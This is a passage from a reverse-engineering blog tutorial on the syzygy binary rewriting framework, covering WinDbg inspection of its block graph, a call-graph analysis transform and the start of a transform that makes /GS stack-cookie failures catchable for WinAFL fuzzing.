Oh, one last thing: the instrumenter is basically the application that decomposes an input binary (comparable to a front-end), present the deconstructed binary (functions, blocks, instructions) to transforms (comparable to a mid-end) that modifies, and finally the back-end part that reconstruct your instrumented binary.

Debugging session

To make things clearer - and because I like debugging sessions - I think it is worthwhile to spend a bit of time in a debugger actually seeing the various structures and how they map to some code we know. Let's take the following C program and compile it in debug mode (don't forget to enable the full PDB generation with the following linker flag: /PROFILE):

#include <stdio.h>

void foo(int x) {
  for(int i = 0; i < x; ++i) {
    printf("Binary rewriting with syzygy\n");
  }
}

int main(int argc, char *argv[]) {
  printf("Hello doar-e.\n");
  foo(argc);
  return 0;
}

Throw it to your favorite debugger with the following command - we will use the afl transformation as an example transform to analyze the data we have available to us:

instrument.exe --mode=afl --input-image=test.exe --output-image=test.instr.exe

And let's place this breakpoint:

bm instrument!*AFLTransform::OnBlock ".if(@@c++(block->type_ == 0)){ }.else{ g }"

Now it's time to inspect the Block associated with our function foo from above:

0:000> g
eax=002dcf80 ebx=00000051 ecx=00482da8 edx=004eaba0 esi=004bd398 edi=004bd318
eip=002dcf80 esp=0113f4b8 ebp=0113f4c8 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
instrument!instrument::transforms::AFLTransform::OnBlock:
002dcf80 55              push    ebp

0:000> dx block
  [+0x000] id_              : 0x51
  [+0x004] type_            : CODE_BLOCK (0)
  [+0x008] size_            : 0x5b
  [+0x00c] alignment_       : 0x1
  [+0x010] alignment_offset_ : 0
  [+0x014] padding_before_  : 0x0
  [+0x018] name_            : 0x4ffc70 : "foo"
  [+0x01c] compiland_name_  : 0x4c50b0 : "D:\tmp\test\Debug\main.obj"
  [+0x020] addr_            [Type: core::detail::AddressImpl<0>]
  [+0x024] block_graph_     : 0x48d10c
  [+0x028] section_         : 0x0
  [+0x02c] attributes_      : 0x8
  [+0x030] references_      : { size=0x3 }
  [+0x038] referrers_       : { size=0x1 }
  [+0x040] source_ranges_   [Type: core::AddressRangeMap<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> >]
  [+0x04c] labels_          : { size=0x3 }
  [+0x054] owns_data_       : false
  [+0x058] data_            : 0x49ef50 : 0x55
  [+0x05c] data_size_       : 0x5b

The above shows us every the different properties available in a Block; we can see it is named foo, has the identifier 0x51 and has a size of 0x5B bytes.

foo_idaview.png
It also has one referrer and 3 references, what could they be? With the explanation I gave above, we can guess that the referrer (or cross-ref) must be the main function as it calls into foo.
0:000> dx -r1 (*((instrument!std::pair<block_graph::BlockGraph::Block *,int> *)0x4f87c0))
  first            : 0x4bd3ac
  second           : 48

0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Block *)0x4bd3ac))
    [+0x000] id_              : 0x52
    [+0x004] type_            : CODE_BLOCK (0)
    [+0x008] size_            : 0x4d
    [+0x00c] alignment_       : 0x1
    [+0x010] alignment_offset_ : 0
    [+0x014] padding_before_  : 0x0
    [+0x018] name_            : 0x4c51a0 : "main"
    [+0x01c] compiland_name_  : 0x4c50b0 : "D:\tmp\test\Debug\main.obj"
    [+0x020] addr_            [Type: core::detail::AddressImpl<0>]
    [+0x024] block_graph_     : 0x48d10c
    [+0x028] section_         : 0x0
    [+0x02c] attributes_      : 0x8
    [+0x030] references_      : { size=0x4 }
    [+0x038] referrers_       : { size=0x1 }
    [+0x040] source_ranges_   [Type: core::AddressRangeMap<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> >]
    [+0x04c] labels_          : { size=0x3 }
    [+0x054] owns_data_       : false
    [+0x058] data_            : 0x49efb0 : 0x55
    [+0x05c] data_size_       : 0x4d

Something to keep in mind when it comes to references is that they are not simply a pointer to a block. A reference does indeed reference a block (duh), but it also has an offset associated to this block to point exactly at where the data is being referenced from.

// Represents a reference from one block to another. References may be offset.
// That is, they may refer to an object at a given location, but actually point
// to a location that is some fixed distance away from that object. This allows,
// for example, non-zero based indexing into a table. The object that is
// intended to be dereferenced is called the 'base' of the offset.
//
// BlockGraph references are from a location (offset) in one block, to some
// location in another block. The referenced block itself plays the role of the
// 'base' of the reference, with the offset of the reference being stored as
// an integer from the beginning of the block. However, basic block
// decomposition requires breaking the block into smaller pieces and thus we
// need to carry around an explicit base value, indicating which byte in the
// block is intended to be referenced.
//
// A direct reference to a location will have the same value for 'base' and
// 'offset'.
//
// Here is an example:
//
//        /----------\
//        +---------------------------+
//  O     |          B                | <--- Referenced block
//        +---------------------------+      B = base
//  \-----/                                  O = offset
//

Let's have a look at the references associated with the foo block now. If you look closely at the block, the set of references is of size 3... what could they be?

One for the printf function, one for the data Block for the string passed to printf maybe?

First reference:
----------------

0:000> dx -r1 (*((instrument!std::pair<int const ,block_graph::BlockGraph::Reference> *)0x4f5640))
    first            : 57
    second           [Type: block_graph::BlockGraph::Reference]
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Reference *)0x4f5644))
    [+0x000] type_            : ABSOLUTE_REF (1) [Type: block_graph::BlockGraph::ReferenceType]
    [+0x004] size_            : 0x4
    [+0x008] referenced_      : 0x4ce334
    [+0x00c] offset_          : 0
    [+0x010] base_            : 0
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Block *)0x4ce334))
    [+0x000] id_              : 0xbc
    [+0x004] type_            : DATA_BLOCK (1)
[...]
    [+0x018] name_            : 0xbb90f8 : "??_C@_0BO@LBGMPKED@Binary?5rewriting?5with?5syzygy?6?$AA@"
    [+0x01c] compiland_name_  : 0x4c50b0 : "D:\tmp\test\Debug\main.obj"
[...]
    [+0x058] data_            : 0x4a11e0 : 0x42
    [+0x05c] data_size_       : 0x1e
0:000> da 0x4a11e0
004a11e0  "Binary rewriting with syzygy."

Second reference:
-----------------

0:000> dx -r1 (*((instrument!std::pair<int const ,block_graph::BlockGraph::Reference> *)0x4f56a0))
    first            : 62
    second           [Type: block_graph::BlockGraph::Reference]
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Reference *)0x4f56a4))
    [+0x000] type_            : PC_RELATIVE_REF (0) [Type: block_graph::BlockGraph::ReferenceType]
    [+0x004] size_            : 0x4
    [+0x008] referenced_      : 0x4bd42c
    [+0x00c] offset_          : 0
    [+0x010] base_            : 0
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Block *)0x4bd42c))
    [+0x000] id_              : 0x53
    [+0x004] type_            : CODE_BLOCK (0)
[...]
    [+0x018] name_            : 0x4ffd60 : "printf"
    [+0x01c] compiland_name_  : 0x4c50b0 : "D:\tmp\test\Debug\main.obj"
[...]

Third reference:
----------------

0:000> dx -r1 (*((instrument!std::pair<int const ,block_graph::BlockGraph::Reference> *)0x4f5a90))
    first            : 83
    second           [Type: block_graph::BlockGraph::Reference]
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Reference *)0x4f5a94))
    [+0x000] type_            : PC_RELATIVE_REF (0) [Type: block_graph::BlockGraph::ReferenceType]
    [+0x004] size_            : 0x4
    [+0x008] referenced_      : 0x4bd52c
    [+0x00c] offset_          : 0
    [+0x010] base_            : 0
0:000> dx -r1 (*((instrument!block_graph::BlockGraph::Block *)0x4bd52c))
    [+0x000] id_              : 0x54
    [+0x004] type_            : CODE_BLOCK (0)
[...]
    [+0x018] name_            : 0xbb96c8 : "_RTC_CheckEsp"
    [+0x01c] compiland_name_  : 0x4c5260 : "f:\binaries\Intermediate\vctools\msvcrt.nativeproj_607447030\objd\x86\_stack_.obj"
[...]

Perfect - that's what we sort of guessed! The last one is just the compiler adding Run-Time Error Checks on us.

Let's have a closer look to the first reference. The references_ member is a hash table of offsets and instances of reference.

// Map of references that this block makes to other blocks.
typedef std::map<Offset, Reference> ReferenceMap;

The offset tells you where exactly in the foo block there is a reference; in our case we can see that the first reference is at offset 57 from the base of the block. If you start IDA real quick and browse at this address, you will see that it points one byte after the PUSH opcode (pointing exactly on the reference to the _Format string):

.text:004010C8 68 20 41 40 00 push    offset _Format  ; "Binary rewriting with syzygy\n"

Another interesting bit I didn't mention earlier is that naturally the data_ field backs the actual content of the Block:

0:000> u @@c++(block->data_)
0049ef50 55              push    ebp
0049ef51 8bec            mov     ebp,esp
0049ef53 81eccc000000    sub     esp,0CCh
0049ef59 53              push    ebx
0049ef5a 56              push    esi
0049ef5b 57              push    edi
0049ef5c 8dbd34ffffff    lea     edi,[ebp-0CCh]
0049ef62 b933000000      mov     ecx,33h

foo_disassview.png
Last but not least, I mentioned SourceRanges (you can see it as a vector of pairs describing data ranges from the binary to the content in memory) before, so let's dump it to see what it looks like:
0:000> dx -r1 (*((instrument!core::AddressRangeMap<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> > *)0x4bd36c))
    [+0x000] range_pairs_     : { size=1 }
0:000> dx -r1 (*((instrument!std::vector<std::pair<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> >,std::allocator<std::pair<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> > > > *)0x4bd36c))
    [0]              : {...}, {...}
0:000> dx -r1 (*((instrument!std::pair<core::AddressRange<int,unsigned int>,core::AddressRange<core::detail::AddressImpl<0>,unsigned int> > *)0x4da1c8))
    first            [Type: core::AddressRange<int,unsigned int>]
    second           [Type: core::AddressRange<core::detail::AddressImpl<0>,unsigned int>]
0:000> dx -r1 (*((instrument!core::AddressRange<int,unsigned int> *)0x4da1c8))
    [+0x000] start_           : 0
    [+0x004] size_            : 0x5b
0:000> dx -r1 (*((instrument!core::AddressRange<core::detail::AddressImpl<0>,unsigned int> *)0x4da1d0))
    [+0x000] start_           [Type: core::detail::AddressImpl<0>]
    [+0x004] size_            : 0x5b
0:000> dx -r1 (*((instrument!core::detail::AddressImpl<0> *)0x4da1d0))
    [+0x000] value_           : 0x1090 [Type: unsigned int]

In this SourceRanges, we have a mapping from the DataRange (RVA 0, size 0x5B), to the SourceRange (RVA 0x1090, size 0x5B - which matches the previous IDA screen shot, obviously). We will come back to those once we have actually modified / rewritten the blocks to see what happens to the SourceRanges.

enum AddressType : uint8_t {
  kRelativeAddressType,
  kAbsoluteAddressType,
  kFileOffsetAddressType,
};

// This class implements an address in a PE image file.
// Addresses are of three varieties:
// - Relative addresses are relative to the base of the image, and thus do not
//   change when the image is relocated. Bulk of the addresses in the PE image
//   format itself are of this variety, and that's where relative addresses
//   crop up most frequently.
// This class is a lightweight wrapper for an integer, which can be freely
// copied. The different address types are deliberately assignment
// incompatible, which helps to avoid confusion when handling different
// types of addresses in implementation.
template <AddressType kType>
class AddressImpl {};

// A virtual address relative to the image base, often termed RVA in
// documentation and in data structure comments.
using RelativeAddress = detail::AddressImpl<kRelativeAddressType>;

Now that you have been introduced to the main concepts, it is time for me to walk you through two small applications.

CallGraphAnalysis

The plan

As the framework exposes all the information you need to rewrite and analyze binary, you are also free to just analyze a binary and not modify a single bit. In this example let's make a Block transform and generate a graph of the relationship between code Blocks (functions). As we are interested in exploring the whole binary and every single code Block, we subclass IterativeTransformImpl:

// Declares a BlockGraphTransform implementation wrapping the common transform
// that iterates over each block in the image.


// An implementation of a BlockGraph transform encapsulating the simple pattern
// of Pre, per-block, and Post functions. The derived class is responsible for
// implementing 'OnBlock' and 'name', and may optionally override Pre and
// Post. The derived type needs to also define the static public member
// variable:
//
//   static const char DerivedType::kTransformName[];
//
// @tparam DerivedType the type of the derived class.
template<class DerivedType>
class IterativeTransformImpl
    : public NamedBlockGraphTransformImpl<DerivedType> { };

Doing so allows us define Pre / Post functions, and an OnBlock function that gets called for every Block encountered in the image. This is pretty handy as I can define an OnBlock callback to mine the information we want for every Block, and define Post to process the data I have accumulated if necessary.

The OnBlock function should be pretty light as we only want to achieve a couple of things:

  1. Make sure we are dealing with a code Block (and not data),
  2. Walk every referrers and store pairs of [ReferrerBlock, CurrentBlock] in a container.

Implementation

The first thing to do is to create a C++ class named CallGraphAnalysis, declared in doare_transform.h and defined in doare_transform.cc. Those files are put in the syzygy/instrument/transforms directory where all others transforms live in:

D:\syzygy\src>git status
On branch dev-doare1
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)

        new file:   syzygy/instrument/transforms/doare_transforms.cc
        new file:   syzygy/instrument/transforms/doare_transforms.h

In order to get it compiled we also need to modify the instrument.gyp project file:

D:\syzygy\src>git diff syzygy/instrument/instrument.gyp
diff --git a/syzygy/instrument/instrument.gyp b/syzygy/instrument/instrument.gyp
index 464c5566..c0eceb87 100644
--- a/syzygy/instrument/instrument.gyp
+++ b/syzygy/instrument/instrument.gyp
@@ -68,6 +70,8 @@
          'transforms/branch_hook_transform.h',
          'transforms/coverage_transform.cc',
          'transforms/coverage_transform.h',
+        'transforms/doare_transforms.cc',
+        'transforms/doare_transforms.h',
          'transforms/entry_call_transform.cc',
          'transforms/entry_call_transform.h',
          'transforms/entry_thunk_transform.cc',

The gyp file is basically used to generate Ninja project files - which means that if you don't regenerate the Ninja files from the updated version of this gyp file, you will not be compiling your new code. In order to force a regeneration, you can invoke the depot_tools command: gclient runhooks.

At this point we are ready to get our class coded up; here is the class declaration I have:

// Axel '0vercl0k' Souchet - 26 Aug 2017

#ifndef SYZYGY_INSTRUMENT_TRANSFORMS_DOARE_TRANSFORMS_H_
#define SYZYGY_INSTRUMENT_TRANSFORMS_DOARE_TRANSFORMS_H_

#include "base/logging.h"
#include "syzygy/block_graph/transform_policy.h"
#include "syzygy/block_graph/transforms/iterative_transform.h"
#include "syzygy/block_graph/transforms/named_transform.h"

namespace instrument {
namespace transforms {

typedef block_graph::BlockGraph BlockGraph;
typedef block_graph::BlockGraph::Block Block;
typedef block_graph::TransformPolicyInterface TransformPolicyInterface;

class CallGraphAnalysis
    : public block_graph::transforms::IterativeTransformImpl<
          CallGraphAnalysis> {
  public:
  CallGraphAnalysis()
      : edges_(),
        main_block_(nullptr),
        total_blocks_(0),
        total_code_blocks_(0) {}

  static const char kTransformName[];

  // Functions needed for IterativeTransform.
  bool OnBlock(const TransformPolicyInterface* policy,
                BlockGraph* block_graph,
                Block* block);

  private:
  std::list<std::pair<Block*, Block*>> edges_;
  Block* main_block_;

  // Stats.
  size_t total_blocks_;
  size_t total_code_blocks_;
};

}  // namespace transforms
}  // namespace instrument

#endif  // SYZYGY_INSTRUMENT_TRANSFORMS_DOARE_TRANSFORMS_H_

After declaring it, the interesting part for us is to have a look at the OnBlock method:

bool CallGraphAnalysis::OnBlock(const TransformPolicyInterface* policy,
                                BlockGraph* block_graph,
                                Block* block) {
  total_blocks_++;

  if (block->type() != BlockGraph::CODE_BLOCK)
    return true;

  if (block->attributes() & BlockGraph::GAP_BLOCK)
    return true;

  VLOG(1) << __FUNCTION__ << ": " << block->name();
  if (block->name() == "main") {
    main_block_ = block;
  }

  // Walk the referrers of this block.
  for (const auto& referrer : block->referrers()) {
    Block* referrer_block(referrer.first);

    // We are not interested in non-code referrers.
    if (referrer_block->type() != BlockGraph::CODE_BLOCK) {
      continue;
    }

    VLOG(1) << referrer_block->name() << " -> " << block->name();

    // Keep track of the relation between the block & its referrer.
    edges_.emplace_back(referrer_block, block);
  }

  total_code_blocks_++;
  return true;
}

The first step of the method is to make sure that the Block we are dealing with is a block we want to analyze. As I have explained before, Blocks are not exclusive code Blocks. That is the reason why we check the type of the block to only accepts code Blocks. Another type of Block that syzygy artificially creates (it has no existence in the image being analyzed) is called a GAP_BLOCK; which is basically a block that fills a gap in the address space. For that reason we also skip those blocks.

At this point we have a code Block and we can start to mine whatever information needed: name, size, referrers, etc. As the thing we are mostly interested about is the relationships between the code Blocks, we have to walk the referrers. The only thing to be wary about is to also exclude data Blocks (a function pointer table would be a data Block referencing a code Block for example) there. After this minor filtering we can just add the two pointers into the container.

I am sure at this stage you are interested in compiling it, and get it to run on a binary. To do that we need to add the plumbing necessary to surface it to instrument.exe tool. First thing you need is an instrumenter, we declare it in doare_instrumenter.h and define it in doare_instrumenter.cc in the syzygy/instrument/instrumenters directory:

D:\syzygy\src>git status
On branch dev-doare1
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)

        new file:   syzygy/instrument/instrumenters/doare_instrumenter.cc
        new file:   syzygy/instrument/instrumenters/doare_instrumenter.h

An instrumenter is basically a class that encapsulate the configuration and the invocation of one or several transforms. The instrumenter can receive options passed by the application, thus can set configuration flags when invoking the transforms, etc. You could imagine parsing a configuration file here, or doing any preparation needed by your transform. Then, the instrumenter registers the transform against the Relinker object (a bit like the pass manager in LLVM if you want to think about it this way).

Anyway, as our transform is trivial we basically don't need any of this "preparation"; so let's settle for the least required:

// Axel '0vercl0k' Souchet - 26 Aug 2017

#ifndef SYZYGY_INSTRUMENT_INSTRUMENTERS_DOARE_INSTRUMENTER_H_
#define SYZYGY_INSTRUMENT_INSTRUMENTERS_DOARE_INSTRUMENTER_H_

#include "base/command_line.h"
#include "syzygy/instrument/instrumenters/instrumenter_with_agent.h"
#include "syzygy/instrument/transforms/doare_transforms.h"
#include "syzygy/pe/pe_relinker.h"

namespace instrument {
namespace instrumenters {

class DoareInstrumenter : public InstrumenterWithRelinker {
  public:
  typedef InstrumenterWithRelinker Super;

  DoareInstrumenter() : Super() {}

  // From InstrumenterWithRelinker
  bool InstrumentPrepare() override;
  bool InstrumentImpl() override;
  const char* InstrumentationMode() override;

  private:
  // The transform for this agent.
  std::unique_ptr<instrument::transforms::CallGraphAnalysis>
      transformer_callgraph_;

  DISALLOW_COPY_AND_ASSIGN(DoareInstrumenter);
};

}  // namespace instrumenters
}  // namespace instrument

#endif  // SYZYGY_INSTRUMENT_INSTRUMENTERS_DOARE_INSTRUMENTER_H_

The InstrumentPrepare method is where the instrumenter registers the transform against the relinker object:

// Axel '0vercl0k' Souchet - 26 Aug 2017

#include "syzygy/instrument/instrumenters/doare_instrumenter.h"

#include "base/logging.h"
#include "base/values.h"
#include "syzygy/application/application.h"

namespace instrument {
namespace instrumenters {

bool DoareInstrumenter::InstrumentPrepare() {
  return true;
}

bool DoareInstrumenter::InstrumentImpl() {
  transformer_callgraph_.reset(new instrument::transforms::CallGraphAnalysis());

  if (!relinker_->AppendTransform(transformer_callgraph_.get())) {
    LOG(ERROR) << "AppendTransform failed.";
    return false;
  }

  return true;
}

const char* DoareInstrumenter::InstrumentationMode() {
  return "Diary of a reverse engineer";
}
}  // namespace instrumenters
}  // namespace instrument

Like before, we also need to add those two files in the instrument.gyp file and regenerate the Ninja project files via the gclient runhooks command:

D:\syzygy\src>git diff syzygy/instrument/instrument.gyp
diff --git a/syzygy/instrument/instrument.gyp b/syzygy/instrument/instrument.gyp
index 464c5566..c0eceb87 100644
--- a/syzygy/instrument/instrument.gyp
+++ b/syzygy/instrument/instrument.gyp
@@ -36,6 +36,8 @@
          'instrumenters/bbentry_instrumenter.h',
          'instrumenters/coverage_instrumenter.cc',
          'instrumenters/coverage_instrumenter.h',
+        'instrumenters/doare_instrumenter.h',
+        'instrumenters/doare_instrumenter.cc',
          'instrumenters/entry_call_instrumenter.cc',
          'instrumenters/entry_call_instrumenter.h',
          'instrumenters/entry_thunk_instrumenter.cc',
@@ -68,6 +70,8 @@
          'transforms/branch_hook_transform.h',
          'transforms/coverage_transform.cc',
          'transforms/coverage_transform.h',
+        'transforms/doare_transforms.cc',
+        'transforms/doare_transforms.h',
          'transforms/entry_call_transform.cc',
          'transforms/entry_call_transform.h',
          'transforms/entry_thunk_transform.cc',

The last step for us is to surface our instrumenter to the main of the application. I just add a mode called doare that you can set via the --mode switch, and if the flag is specified it instantiates the newly born DoareInstrumenter.

D:\syzygy\src>git diff syzygy/instrument/instrument_app.cc
diff --git a/syzygy/instrument/instrument_app.cc b/syzygy/instrument/instrument_app.cc
index 72bb40b8..c54258d8 100644
--- a/syzygy/instrument/instrument_app.cc
+++ b/syzygy/instrument/instrument_app.cc
@@ -29,6 +29,7 @@
  #include "syzygy/instrument/instrumenters/bbentry_instrumenter.h"
  #include "syzygy/instrument/instrumenters/branch_instrumenter.h"
  #include "syzygy/instrument/instrumenters/coverage_instrumenter.h"
+#include "syzygy/instrument/instrumenters/doare_instrumenter.h"
  #include "syzygy/instrument/instrumenters/entry_call_instrumenter.h"
  #include "syzygy/instrument/instrumenters/entry_thunk_instrumenter.h"
  #include "syzygy/instrument/instrumenters/flummox_instrumenter.h"
@@ -41,7 +42,7 @@ static const char kUsageFormatStr[] =
      "Usage: %ls [options]\n"
      "  Required arguments:\n"
      "    --input-image=<path> The input image to instrument.\n"
-    "    --mode=afl|asan|bbentry|branch|calltrace|coverage|flummox|profile\n"
+    "    --mode=afl|asan|bbentry|branch|calltrace|coverage|doare|flummox|profile\n"
      "                            Specifies which instrumentation mode is to\n"
      "                            be used. If this is not specified it is\n"
      "                            equivalent to specifying --mode=calltrace\n"
@@ -192,6 +193,8 @@ bool InstrumentApp::ParseCommandLine(const base::CommandLine* cmd_line) {
            instrumenters::EntryThunkInstrumenter::CALL_TRACE));
      } else if (base::LowerCaseEqualsASCII(mode, "coverage")) {
        instrumenter_.reset(new instrumenters::CoverageInstrumenter());
+    } else if (base::LowerCaseEqualsASCII(mode, "doare")) {
+      instrumenter_.reset(new instrumenters::DoareInstrumenter());
      } else if (base::LowerCaseEqualsASCII(mode, "flummox")) {
        instrumenter_.reset(new instrumenters::FlummoxInstrumenter());
      } else if (base::LowerCaseEqualsASCII(mode, "profile")) {

This should be it! Recompiling the instrument project should be enough to be able to invoke the transform and see some of our debug messages:

D:\Downloads\syzygy\src>ninja -C out\Release instrument
ninja: Entering directory `out\Release'
[4/4] LINK_EMBED instrument.exe

D:\Downloads\syzygy\src>out\Release\instrument.exe --input-image=out\Release\instrument.exe --output-image=nul --mode=doare --verbose
[...]
[0902/120452:VERBOSE1:doare_transforms.cc(22)] instrument::transforms::CallGraphAnalysis::OnBlock: block_graph::BlockGraph::AddressSpace::GetBlockByAddress
[0902/120452:VERBOSE1:doare_transforms.cc(36)] pe::`anonymous namespace'::Decompose -> block_graph::BlockGraph::AddressSpace::GetBlockByAddress
[0902/120452:VERBOSE1:doare_transforms.cc(36)] pe::`anonymous namespace'::Decompose -> block_graph::BlockGraph::AddressSpace::GetBlockByAddress
[...]

Visualize it?

As I was writing this I figured it might be worth to spend a bit of time trying to visualize this network to make it more attractive for the readers. So I decided to use visjs and the Post callback to output the call-graph in a way visjs would understand:

bool CallGraphAnalysis::PostBlockGraphIteration(
    const TransformPolicyInterface* policy,
    BlockGraph* block_graph,
    Block* header_block) {
  VLOG(1) << "      Blocks found: " << total_blocks_;
  VLOG(1) << " Code Blocks found: " << total_code_blocks_;

  if (main_block_ == nullptr) {
    LOG(ERROR) << "A 'main' block is mandatory.";
    return false;
  }

  // Now we walk the graph from the 'main' block, with a BFS algorithm.
  uint32_t idx = 0, level = 0;
  std::list<std::pair<Block*, Block*>> selected_edges;
  std::map<Block*, uint32_t> selected_nodes;
  std::map<Block*, uint32_t> selected_nodes_levels;
  std::set<Block*> nodes_to_inspect{main_block_};
  while (nodes_to_inspect.size() > 0) {
    // Make a copy of the node to inspect so that we can iterate
    // over them.
    std::set<Block*> tmp = nodes_to_inspect;

    // The node selected to be inspected in the next iteration of
    // the loop will be added in this set.
    nodes_to_inspect.clear();

    // Go through every nodes to find to what nodes they are connected
    // to.
    for (const auto& node_to_inspect : tmp) {
      // Assign an index and a level to the node.
      selected_nodes.emplace(node_to_inspect, idx++);
      selected_nodes_levels[node_to_inspect] = level;

      // Now let's iterate through the edges to find to what nodes, the current
      // one is connected to.
      for (const auto& edge : edges_) {
        // We are interested to find edges connected to the current node.
        if (edge.first != node_to_inspect) {
          continue;
        }

        // Get the connected node and make sure we haven't handled it already.
        Block* to_block(edge.second);
        if (selected_nodes.count(to_block) > 0) {
          continue;
        }

        selected_nodes.emplace(to_block, idx++);
        selected_nodes_levels[to_block] = level + 1;

        // If it's a
        selected_edges.emplace_back(node_to_inspect, to_block);

        // We need to analyze this block at the next iteration (level + 1).
        nodes_to_inspect.insert(to_block);
      }
    }

    // Bump the level as we finished analyzing the nodes we wanted to inspect.
    level++;
  }

  std::cout << "var nodes = new vis.DataSet([" << std::endl;
  for (const auto& node : selected_nodes) {
    Block* block(node.first);
    const char* compiland_path = block->compiland_name().c_str();
    const char* compiland_name = strrchr(compiland_path, '\\');
    char description[1024];

    if (compiland_name != nullptr) {
      compiland_name++;
    } else {
      compiland_name = "Unknown";
    }

    uint32_t level = selected_nodes_levels[block];
    _snprintf_s(description, ARRAYSIZE(description), _TRUNCATE,
                "RVA: %p<br>Size: %d<br>Level: %d<br>Compiland: %s",
                (void*)block->addr().value(), block->size(), level,
                compiland_name);

    std::cout << "  { id : " << node.second << ", label : \"" << block->name()
              << "\", "
              << "title : '" << description << "', group : " << level
              << ", value : " << block->size() << " }," << std::endl;
  }
  std::cout << "]);" << std::endl
            << std::endl;

  std::cout << "var edges = new vis.DataSet([" << std::endl;
  for (const auto& edge : selected_edges) {
    std::cout << "  { from : " << selected_nodes.at(edge.first)
              << ", to : " << selected_nodes.at(edge.second) << " },"
              << std::endl;
  }
  std::cout << "]);" << std::endl;
  return true;
}

The above function basically starts to walk the network from the main function and do a BFS algorithm (that allows us to define levels for each Block). It then outputs two sets of data: the nodes, and the edges.

If you would like to check out the result I have uploaded an interactive network graph here: network.afl-fuzz.exe.html. Even though it sounds pretty useless, it looks pretty cool!

SecurityCookieCheckHookTransform

The problem

The idea for this transform came back when I was playing around with WinAFL; I encountered a case where one of the test-case triggered a /GS violation in a harness program I was fuzzing. Buffer security checks are a set of compiler and runtime instrumentation aiming at detecting and preventing the exploitation of stack-based buffer overflows. A cookie is placed on the stack by the prologue of the protected function in between the local variables of the stack-frame and the saved stack pointer / saved instruction pointer. The compiler instruments the code so that before the function returns, it invokes a check function (called __security_check_cookie) that ensure the integrity of the cookie.

; void __fastcall __security_check_cookie(unsigned int cookie)
@__security_check_cookie@4 proc near
cookie= dword ptr -4
    cmp     ecx, ___security_cookie
    repne jnz short failure
    repne retn
failure:
    repne jmp ___report_gsfailure
@__security_check_cookie@4 endp

If the cookie matches the secret, everything is fine, the function returns and life goes on. If it does not, it means something overwrote it and as a result the process needs to be killed. The way the check function achieves this is by raising an exception that the process cannot even catch itself; which makes sense if you think about it as you don't want an attacker to be able to hijack the exception.

On recent version of Windows, this is achieved via a fail-fast exception or by invoking [UnhandledExceptionFilter](https://msdn.microsoft.com/en-us/library/windows/desktop/ms681401(v=vs.85).aspx) (after forcing the top level exception filter to 0) and terminating the process (done by __raise_securityfailure).

; void __cdecl __raise_securityfailure(_EXCEPTION_POINTERS *const exception_pointers)
___raise_securityfailure proc near
exception_pointers= dword ptr  8
    push    ebp
    mov     ebp, esp
    push    0
    call    ds:__imp__SetUnhandledExceptionFilter@4
    mov     eax, [ebp+exception_pointers]
    push    eax
    call    ds:__imp__UnhandledExceptionFilter@4
    push    0C0000409h
    call    ds:__imp__GetCurrentProcess@0
    push    eax
    call    ds:__imp__TerminateProcess@8
    pop     ebp
    retn
___raise_securityfailure endp

Funny enough - if this sounds familiar - turns out I have encountered this very problem a while back and you can read the story here: Having a Look at the Windows' User/Kernel Exceptions Dispatcher.

The thing is when you are fuzzing, this is exactly the type of thing you would like to be aware of. WinAFL uses an in-process exception handler to do the crash monitoring part which means that this type of crashes would not go through the crash monitoring. Bummer.

The solution

I started evaluating syzygy with this simple task: making the program crash with a regular exception (that can get caught by an in-process exception handler). I figured it would be a walk in the park, as I basically needed to apply very little transformation to the binary to make this work.

First step is to define a transform as in the previous example. This time I subclass NamedBlockGraphTransformImpl which wants me to implement a TransformBlockGraph method that receives: a transform policy (used to make decision before applying transformation), the graph (block_graph) and a data Block that represents the PE header of our image (header_block):

class SecurityCookieCheckHookTransform
    : public block_graph::transforms::NamedBlockGraphTransformImpl<
          SecurityCookieCheckHookTransform> {
  public:
  SecurityCookieCheckHookTransform() {}

  static const char kTransformName[];
  static const char kReportGsFailure[];
  static const char kSyzygyReportGsFailure[];
  static const uint32_t kInvalidUserAddress;

  // BlockGraphTransformInterface implementation.
  bool TransformBlockGraph(const TransformPolicyInterface* policy,
                            BlockGraph* block_graph,
                            BlockGraph::Block* header_block) final;
};

As I explained a bit earlier, the BlockGraph is the top level container of Blocks. This is what I walk through in order to find our Block of interest. The Block of interest for us has the name __report_gsfailure:

BlockGraph::Block* report_gsfailure = nullptr;
BlockGraph::BlockMap& blocks = block_graph->blocks_mutable();
for (auto& block : blocks) {
  std::string name(block.second.name());
  if (name == kReportGsFailure) {
    report_gsfailure = &block.second;
    break;
  }
}

if (report_gsfailure == nullptr) {
  LOG(ERROR) << "Could not find " << kReportGsFailure << ".";
  return false;
}

The transform tries to be careful by checking that the Block only has a single referrer: which should be the __security_cookie_check Block. If not, I gracefully exit and don't apply the transformation as I am not sure with what I am dealing with.

if (report_gsfailure->referrers().size() != 1) {
  // We bail out if we don't have a single referrer as the only
  // expected referrer is supposed to be __security_cookie_check.
  // If there is more than one, we would rather bail out than take
  // a chance at modifying the behavior of the PE image.
  LOG(ERROR) << "Only a single referrer to " << kReportGsFailure
              << " is expected.";
  return false;
}

At this point, I create a new Block that has only a single instruction designed to trigger a fault every time; to do so I can even use the basic Intel assembler integrated in syzygy. After this, I place this new Block inside the .text section the image (tracked by the BlockGraph as mentioned earlier).

BlockGraph::Section* section_text = block_graph->FindOrAddSection(
    pe::kCodeSectionName, pe::kCodeCharacteristics);

// All of the below is needed to build the instrumentation via the assembler.
BasicBlockSubGraph bbsg;
BasicBlockSubGraph::BlockDescription* block_desc = bbsg.AddBlockDescription(
    kSyzygyReportGsFailure, nullptr, BlockGraph::CODE_BLOCK,
    section_text->id(), 1, 0);

BasicCodeBlock* bb = bbsg.AddBasicCodeBlock(kSyzygyReportGsFailure);
